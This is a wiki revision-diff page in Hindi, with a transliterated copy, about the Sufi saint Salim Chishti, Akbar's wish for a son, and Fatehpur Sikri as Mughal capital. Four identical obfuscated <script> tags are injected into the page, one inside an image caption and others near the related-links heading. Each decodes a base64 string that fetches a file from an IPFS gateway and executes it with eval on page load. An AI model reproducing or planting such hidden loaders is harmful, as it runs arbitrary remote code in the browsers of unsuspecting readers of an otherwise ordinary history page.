Difference between revisions of "सलीम चिश्ती"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 3: Line 3:
 
सलीम चिश्ती अजमेर के ख्वाज़ा मुईनुद्दीन् चिश्ती के पौत्र थे । जब बादशाह [[अकबर]] द्वारा संतान प्राप्ति की दिशा में किए गए सभी प्रयास निष्फल रहे तो वह स्वप्न में आए निर्देश के मुताबिक़ बाबा सलीम चिश्ती के पास आए । उन्हीं के आशीर्वाद से अकबर को महारानी जोधाबाई से पुत्र प्राप्ति हुई और बाबा के नाम पर उसका नाम भी सलीम रखा गया । बाबा सलीम चिश्ती के सम्मान में ही बादशाह अकबर ने  [[बुलंद दरवाजा]] बनवाया था । उसके बाद अकबर ने [[फतेहपुर सीकरी]] को अपनी राजधानी भी बनाया लेकिन केवल 15 वर्षों में ही उसे अपना यह निर्णय बदलना पड़ा ।  यहाँ पर बादशाह अकबर का महल भी है जो कि भारत सरकार के पुरातत्व संरक्षण विभाग द्वारा संरक्षित है । यहाँ पर जोधाबाई महल, पंचमहल, अस्तबल, पचीसी दरबार, दीवान-ऐ-ख़ास, दीवान-ऐ-आम, बीरबल महल, अनूप तालाब भी है जहाँ पर सुरसम्राट [[तानसेन]] अपना संगीत सुनाते थे ।
 
सलीम चिश्ती अजमेर के ख्वाज़ा मुईनुद्दीन् चिश्ती के पौत्र थे । जब बादशाह [[अकबर]] द्वारा संतान प्राप्ति की दिशा में किए गए सभी प्रयास निष्फल रहे तो वह स्वप्न में आए निर्देश के मुताबिक़ बाबा सलीम चिश्ती के पास आए । उन्हीं के आशीर्वाद से अकबर को महारानी जोधाबाई से पुत्र प्राप्ति हुई और बाबा के नाम पर उसका नाम भी सलीम रखा गया । बाबा सलीम चिश्ती के सम्मान में ही बादशाह अकबर ने  [[बुलंद दरवाजा]] बनवाया था । उसके बाद अकबर ने [[फतेहपुर सीकरी]] को अपनी राजधानी भी बनाया लेकिन केवल 15 वर्षों में ही उसे अपना यह निर्णय बदलना पड़ा ।  यहाँ पर बादशाह अकबर का महल भी है जो कि भारत सरकार के पुरातत्व संरक्षण विभाग द्वारा संरक्षित है । यहाँ पर जोधाबाई महल, पंचमहल, अस्तबल, पचीसी दरबार, दीवान-ऐ-ख़ास, दीवान-ऐ-आम, बीरबल महल, अनूप तालाब भी है जहाँ पर सुरसम्राट [[तानसेन]] अपना संगीत सुनाते थे ।
 
[[चित्र:Fatehpur-Sikri-Agra.jpg|[[फतेहपुर सीकरी]], [[आगरा]]<br /> Fatehpur Sikri, Agra|thumb|left]]
 
[[चित्र:Fatehpur-Sikri-Agra.jpg|[[फतेहपुर सीकरी]], [[आगरा]]<br /> Fatehpur Sikri, Agra|thumb|left]]
सीकरी में एक सूफ़ी सन्त शेख़ सलीम चिश्ती रहा करते थे। उनकी शोहरत सुनकर अकबर, एक पुत्र की कामना लेकर उनके पास पहुंचा और जब अकबर को बेटा हुआ तो अकबर ने उसका नाम सलीम रखा। सीकरी में जहां सलीम चिश्ती रहते थे उसी के पास अकबर ने सन 1571 में एक क़िला बनवाना शुरु किया। अकबर की कई रानियाँ और बेगम थीं, किंतु उनमें से किसी से भी पुत्र नहीं हुआ था। अकबर पीरों एवं फकीरों से पुत्र प्राप्ति के लिए दुआएँ माँगता फिरता था। शेख सलीम चिश्ती ने अकबर को दुआ दी। दैवयोग से अकबर की बड़ी रानी जो कछवाहा राजा बिहारीमल की पुत्री और भगवानदास की बहिन थी, गर्भवती हो गई, और उसने पुत्र को जन्म दिया। उसका नाम शेख के नाम पर सलीम रखा गया जो बाद में [[जहाँगीर]] के नाम से अकबर का उत्तराधिकारी हुआ। अकबर शेख से बहुत प्रभावित था। उसने अपनी राजधानी सीकरी में ही रखने का निश्चय किया। सन 1571 में राजधानी का स्थानांतरण किया गया। उसी साल अकबर ने गुजरात को फ़तह किया। इस कारण नई राजधानी का नाम फतेहपुर सीकरी रखा गया। सन 1584 तक लगभग 14 वर्ष तक फतेहपुर सीकरी ही मुग़ल साम्राज्य की राजधानी रही। अकबर ने अनेक निर्माण कार्य कराये, जिससे वह आगरा के समान बड़ी नगरी बन गई थी। फतेहपुर सीकरी समस्त देश की प्रशासनिक गतिविधियों का प्रमुख केन्द्र थी। सन 1584 में एक अंग्रेज व्यापारी अकबर की राजधानी आया, उसने लिखा है− 'आगरा और फतेहपुर दोनों बड़े शहर हैं। उनमें से हर एक लंदन से बड़ा और अधिक जनसंकुल है। सारे भारत और ईरान के व्यापारी यहाँ रेशमी तथा दूसरे कपड़े, बहुमूल्य रत्न, लाल, हीरा और मोती बेचने के लिए लाते हैं।'
+
सीकरी में एक सूफ़ी सन्त शेख़ सलीम चिश्ती रहा करते थे। उनकी शोहरत सुनकर अकबर, एक पुत्र की कामना लेकर उनके पास पहुंचा और जब अकबर को बेटा हुआ तो अकबर ने उसका नाम सलीम रखा। सीकरी में जहां सलीम चिश्ती रहते थे उसी के पास अकबर ने सन 1571 में एक क़िला बनवाना शुरु किया। अकबर की कई रानियाँ और बेगम थीं, किंतु उनमें से किसी से भी पुत्र नहीं हुआ था। अकबर पीरों एवं फकीरों से पुत्र प्राप्ति के लिए दुआएँ माँगता फिरता था। शेख सलीम चिश्ती ने अकबर को दुआ दी। दैवयोग से अकबर की बड़ी रानी जो कछवाहा राजा बिहारीमल की पुत्री और भगवानदास की बहिन थी, गर्भवती हो गई, और उसने पुत्र को जन्म दिया। उसका नाम शेख के नाम पर सलीम रखा गया जो बाद में [[जहाँगीर]] के नाम से अकबर का उत्तराधिकारी हुआ। अकबर शेख से बहुत प्रभावित था। उसने अपनी राजधानी सीकरी में ही रखने का निश्चय किया। सन 1571 में राजधानी का स्थानांतरण किया गया। उसी साल अकबर ने गुजरात को फ़तह किया। इस कारण नई राजधानी का नाम फतेहपुर सीकरी रखा गया। सन 1584 तक लगभग 14 वर्ष तक फतेहपुर सीकरी ही मुग़ल साम्राज्य की राजधानी रही। अकबर ने अनेक निर्माण कार्य कराये, जिससे वह आगरा के समान बड़ी नगरी बन गई थी। फतेहपुर सीकरी समस्त देश की प्रशासनिक गतिविधियों का प्रमुख केन्द्र थी। सन 1584 में एक अंग्रेज व्यापारी अकबर की राजधानी आया, उसने लिखा है− 'आगरा और फतेहपुर दोनों बड़े शहर हैं। उनमें से हर एक लंदन से बड़ा और अधिक जनसंकुल है। सारे भारत और [[ईरान]] के व्यापारी यहाँ रेशमी तथा दूसरे कपड़े, बहुमूल्य रत्न, लाल, हीरा और मोती बेचने के लिए लाते हैं।'
  
 
{{Panorama
 
{{Panorama

Revision as of 08:49, 29 July 2010

40px panna banane ki prakriya mean hai. ap isako taiyar karane mean sahayata kar sakate haian.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

buland daravaja, fatehapur sikari, agara
Buland Darwaja, Fatehpur Sikri, Agra

salim chishti ajamer ke khvaza mueenuddinh chishti ke pautr the . jab badashah akabar dvara santan prapti ki disha mean kie ge sabhi prayas nishphal rahe to vah svapn mean ae nirdesh ke mutabiq baba salim chishti ke pas ae . unhian ke ashirvad se akabar ko maharani jodhabaee se putr prapti huee aur baba ke nam par usaka nam bhi salim rakha gaya . baba salim chishti ke samman mean hi badashah akabar ne buland daravaja banavaya tha . usake bad akabar ne phatehapur sikari ko apani rajadhani bhi banaya lekin keval 15 varshoan mean hi use apana yah nirnay badalana p da . yahaan par badashah akabar ka mahal bhi hai jo ki bharat sarakar ke puratatv sanrakshan vibhag dvara sanrakshit hai . yahaan par jodhabaee mahal, panchamahal, astabal, pachisi darabar, divan-ai-khas, divan-ai-am, birabal mahal, anoop talab bhi hai jahaan par surasamrat tanasen apana sangit sunate the . [[chitr:Fatehpur-Sikri-Agra.jpg|phatehapur sikari, agara
Fatehpur Sikri, Agra|thumb|left]] sikari mean ek soofi sant shekh salim chishti raha karate the. unaki shoharat sunakar akabar, ek putr ki kamana lekar unake pas pahuancha aur jab akabar ko beta hua to akabar ne usaka nam salim rakha. sikari mean jahaan salim chishti rahate the usi ke pas akabar ne san 1571 mean ek qila banavana shuru kiya. akabar ki kee raniyaan aur begam thian, kiantu unamean se kisi se bhi putr nahian hua tha. akabar piroan evan phakiroan se putr prapti ke lie duaean maangata phirata tha. shekh salim chishti ne akabar ko dua di. daivayog se akabar ki b di rani jo kachhavaha raja biharimal ki putri aur bhagavanadas ki bahin thi, garbhavati ho gee, aur usane putr ko janm diya. usaka nam shekh ke nam par salim rakha gaya jo bad mean jahaangir ke nam se akabar ka uttaradhikari hua. akabar shekh se bahut prabhavit tha. usane apani rajadhani sikari mean hi rakhane ka nishchay kiya. san 1571 mean rajadhani ka sthanaantaran kiya gaya. usi sal akabar ne gujarat ko fatah kiya. is karan nee rajadhani ka nam phatehapur sikari rakha gaya. san 1584 tak lagabhag 14 varsh tak phatehapur sikari hi mugal samrajy ki rajadhani rahi. akabar ne anek nirman kary karaye, jisase vah agara ke saman b di nagari ban gee thi. phatehapur sikari samast desh ki prashasanik gatividhiyoan ka pramukh kendr thi. san 1584 mean ek aangrej vyapari akabar ki rajadhani aya, usane likha hai− 'agara aur phatehapur donoan b de shahar haian. unamean se har ek landan se b da aur adhik janasankul hai. sare bharat aur eeran ke vyapari yahaan reshami tatha doosare kap de, bahumooly ratn, lal, hira aur moti bechane ke lie late haian.'

[[chitr:Fatehpur-Sikri-Agra-2.jpg|x200px|alt=fatehapur sikari|shekh salim chishti ki daragah (fatehapur sikari) ka vihangam drishy
Panoramic View Of Shekh Salim Chishti Shrine (Fatehpur Sikri)]]
<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>shekh salim chishti ki daragah (fatehapur sikari) ka vihangam drishy
Panoramic View Of Shekh Salim Chishti Shrine (Fatehpur Sikri)

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sambandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>